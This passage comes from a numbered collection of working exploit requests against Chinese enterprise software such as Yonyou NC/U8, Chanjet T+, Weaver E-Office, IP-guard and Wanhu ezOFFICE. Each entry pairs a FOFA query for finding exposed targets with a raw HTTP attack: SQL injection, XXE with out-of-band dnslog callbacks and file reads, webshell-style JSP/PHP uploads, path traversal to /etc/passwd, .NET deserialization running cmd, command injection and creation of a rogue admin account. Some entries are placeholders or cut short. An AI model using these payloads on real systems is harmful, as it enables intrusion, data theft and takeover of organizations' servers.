Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
   <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
   </ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
            }
        }
    }
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo": {
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
            }
        }
    }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
